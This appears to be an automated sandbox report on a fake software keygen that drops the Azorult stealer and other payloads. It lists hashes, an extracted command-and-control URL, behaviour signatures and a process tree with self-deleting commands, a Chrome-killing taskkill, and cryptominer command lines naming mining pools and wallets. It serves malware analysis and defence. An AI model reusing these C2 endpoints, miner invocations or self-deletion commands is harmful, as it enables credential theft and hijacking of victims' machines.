Analysis
-
max time kernel
24s -
max time network
61s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 11:04
Static task
static1
Behavioral task
behavioral1
Sample
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
Resource
win10v20201028
General
-
Target
Delphi_Wmi_Class_Generator_serial_keys_gen.exe
-
Size
5.4MB
-
MD5
3b024ffc1fdf4ef5bc78fe48d0feb1a0
-
SHA1
859b62beef8bc1e7495a6d063d309586163869db
-
SHA256
4ff87821343d06ad2d65b085c487f825ca876e368c9367ad57a3d243c2633c81
-
SHA512
e68746f8a3ba67d83447be76372438512026fe698e5547d310b38f6e8e9d52f2e03492fb66e5687cd969032bcec9fda80dd45dedf0a40f0de7ad1b7d1cec0416
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Executes dropped EXE 6 IoCs
pid Process 3636 keygen-pr.exe 2600 keygen-step-1.exe 1312 keygen-step-3.exe 4028 keygen-step-4.exe 3036 key.exe 1132 Setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 92 api.ipify.org 101 ipinfo.io 103 ipinfo.io -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
pid Process 4224 taskkill.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2392 PING.EXE 4008 PING.EXE 4228 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 106 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 102 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1132 Setup.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 540 wrote to memory of 188 540 Delphi_Wmi_Class_Generator_serial_keys_gen.exe 78 PID 540 wrote to memory of 188 540 Delphi_Wmi_Class_Generator_serial_keys_gen.exe 78 PID 540 wrote to memory of 188 540 Delphi_Wmi_Class_Generator_serial_keys_gen.exe 78 PID 188 wrote to memory of 3636 188 cmd.exe 81 PID 188 wrote to memory of 3636 188 cmd.exe 81 PID 188 wrote to memory of 3636 188 cmd.exe 81 PID 188 wrote to memory of 2600 188 cmd.exe 82 PID 188 wrote to memory of 2600 188 cmd.exe 82 PID 188 wrote to memory of 2600 188 cmd.exe 82 PID 188 wrote to memory of 1312 188 cmd.exe 83 PID 188 wrote to memory of 1312 188 cmd.exe 83 PID 188 wrote to memory of 1312 188 cmd.exe 83 PID 188 wrote to memory of 4028 188 cmd.exe 84 PID 188 wrote to memory of 4028 188 cmd.exe 84 PID 188 wrote to memory of 4028 188 cmd.exe 84 PID 3636 wrote to memory of 3036 3636 keygen-pr.exe 85 PID 3636 wrote to memory of 3036 3636 keygen-pr.exe 85 PID 3636 wrote to memory of 3036 3636 keygen-pr.exe 85 PID 4028 wrote to memory of 1132 4028 keygen-step-4.exe 86 PID 4028 wrote to memory of 1132 4028 keygen-step-4.exe 86 PID 1312 wrote to memory of 3292 1312 keygen-step-3.exe 87 PID 1312 wrote to memory of 3292 1312 keygen-step-3.exe 87 PID 1312 wrote to memory of 3292 1312 keygen-step-3.exe 87
Processes
-
C:\Users\Admin\AppData\Local\Temp\Delphi_Wmi_Class_Generator_serial_keys_gen.exe"C:\Users\Admin\AppData\Local\Temp\Delphi_Wmi_Class_Generator_serial_keys_gen.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:540 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:188 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2340
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:3292
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2392
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\18R3DUYDI6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\18R3DUYDI6\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\18R3DUYDI6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\18R3DUYDI6\multitimer.exe" 1 3.1617447935.60684bffb2c45 1016⤵PID:4548
-
C:\Users\Admin\AppData\Local\Temp\18R3DUYDI6\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\18R3DUYDI6\multitimer.exe" 2 3.1617447935.60684bffb2c457⤵PID:4632
-
C:\Users\Admin\AppData\Local\Temp\jz2zpk43f5k\4gjpe4wgruw.exe"C:\Users\Admin\AppData\Local\Temp\jz2zpk43f5k\4gjpe4wgruw.exe" /ustwo INSTALL8⤵PID:5060
-
-
C:\Users\Admin\AppData\Local\Temp\vrhnsdlhd2u\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\vrhnsdlhd2u\KiffApp1.exe"8⤵PID:4792
-
-
C:\Users\Admin\AppData\Local\Temp\b2ia3w2nyvb\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\b2ia3w2nyvb\Setup3310.exe" /Verysilent /subid=5778⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\is-79P1J.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-79P1J.tmp\Setup3310.tmp" /SL5="$202AE,138429,56832,C:\Users\Admin\AppData\Local\Temp\b2ia3w2nyvb\Setup3310.exe" /Verysilent /subid=5779⤵PID:5152
-
-
-
C:\Users\Admin\AppData\Local\Temp\xxdwdkp4yl5\vict.exe"C:\Users\Admin\AppData\Local\Temp\xxdwdkp4yl5\vict.exe" /VERYSILENT /id=5358⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\is-58696.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-58696.tmp\vict.tmp" /SL5="$202FC,870426,780800,C:\Users\Admin\AppData\Local\Temp\xxdwdkp4yl5\vict.exe" /VERYSILENT /id=5359⤵PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\gbsk3cvzwxp\5ymotrtwbdf.exe"C:\Users\Admin\AppData\Local\Temp\gbsk3cvzwxp\5ymotrtwbdf.exe" /VERYSILENT8⤵PID:5276
-
C:\Users\Admin\AppData\Local\Temp\is-S9Q86.tmp\5ymotrtwbdf.tmp"C:\Users\Admin\AppData\Local\Temp\is-S9Q86.tmp\5ymotrtwbdf.tmp" /SL5="$1033A,2592217,780800,C:\Users\Admin\AppData\Local\Temp\gbsk3cvzwxp\5ymotrtwbdf.exe" /VERYSILENT9⤵PID:5368
-
-
-
C:\Users\Admin\AppData\Local\Temp\cbbej5kasy5\s1myrzojsox.exe"C:\Users\Admin\AppData\Local\Temp\cbbej5kasy5\s1myrzojsox.exe"8⤵PID:5448
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\cbbej5kasy5\s1myrzojsox.exe"9⤵PID:6024
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fgh1f01kd1t\arjkqw0tbum.exe"C:\Users\Admin\AppData\Local\Temp\fgh1f01kd1t\arjkqw0tbum.exe" /quiet SILENT=1 AF=7568⤵PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\s2chpcyc0oa\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\s2chpcyc0oa\cpyrix.exe" /VERYSILENT8⤵PID:5628
-
-
C:\Users\Admin\AppData\Local\Temp\hed5qeordbg\vpn.exe"C:\Users\Admin\AppData\Local\Temp\hed5qeordbg\vpn.exe" /silent /subid=4828⤵PID:5736
-
C:\Users\Admin\AppData\Local\Temp\is-5K1EG.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-5K1EG.tmp\vpn.tmp" /SL5="$3041E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\hed5qeordbg\vpn.exe" /silent /subid=4829⤵PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\o5u5nkp0ag5\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\o5u5nkp0ag5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5828
-
C:\Users\Admin\AppData\Local\Temp\is-GF68O.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-GF68O.tmp\IBInstaller_97039.tmp" /SL5="$10432,14574917,721408,C:\Users\Admin\AppData\Local\Temp\o5u5nkp0ag5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5908
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-H4TL2.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:6096
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-H4TL2.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5072
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\25ddij5qwt2\app.exe"C:\Users\Admin\AppData\Local\Temp\25ddij5qwt2\app.exe" /8-238⤵PID:5980
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E5SZAT9N16\setups.exe"C:\Users\Admin\AppData\Local\Temp\E5SZAT9N16\setups.exe" ll5⤵PID:1712
-
C:\Users\Admin\AppData\Local\Temp\is-4HTTL.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-4HTTL.tmp\setups.tmp" /SL5="$8006A,635399,250368,C:\Users\Admin\AppData\Local\Temp\E5SZAT9N16\setups.exe" ll6⤵PID:3452
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵PID:3808
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4144
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:4700
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4780
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4988
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4828
-
C:\Users\Admin\AppData\Roaming\EAC3.tmp.exe"C:\Users\Admin\AppData\Roaming\EAC3.tmp.exe"5⤵PID:4180
-
C:\Users\Admin\AppData\Roaming\EAC3.tmp.exe"C:\Users\Admin\AppData\Roaming\EAC3.tmp.exe"6⤵PID:356
-
-
-
C:\Users\Admin\AppData\Roaming\EC6A.tmp.exe"C:\Users\Admin\AppData\Roaming\EC6A.tmp.exe"5⤵PID:4132
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:4184
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:4540
-
-
-
C:\Users\Admin\AppData\Roaming\EE01.tmp.exe"C:\Users\Admin\AppData\Roaming\EE01.tmp.exe"5⤵PID:1172
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:6084
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:2172
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4200
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4268
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4684
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:1996
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\907ce9ccb71542d68f91849146f1c7c4 /t 4800 /p 46841⤵PID:5580